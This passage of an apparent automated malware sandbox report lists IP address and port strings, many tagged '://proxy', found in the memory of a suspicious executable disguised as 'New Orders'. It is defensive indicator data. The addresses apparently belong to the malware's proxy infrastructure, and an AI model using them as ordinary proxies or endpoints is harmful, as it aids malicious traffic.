                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:64494
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:64494://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29B8C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2643B000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.247.217:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.247.217:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82:12542
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82:12542://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.10
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.109:9090
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.109:9090://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.219:55994
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.219:55994://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.126:46656
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.126:46656://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.16:55994
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.16:55994://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.84:11537
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.84:11537://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.77:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.77:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.78:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.78:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28A7A000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28959000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD263DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.159.232.6:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.159.232.6:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.251.177:6270
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.251.177:6270://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.232.2:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.232.2:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.88.242:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.45.44.51:6332
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.45.44.51:6332://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.129.154:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.129.154:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.55:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.55:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.6.39:9080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.6.39:9080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.9
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:9080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:9080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.102:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.102:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.89:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.89:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.83.108.89:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.83.108.89:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2639E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.13
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2703C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26FC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.76:1976
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.76:1976://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.185:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.185:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.180.70.2:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.180.70.2:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.190.57.57:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650://proxy
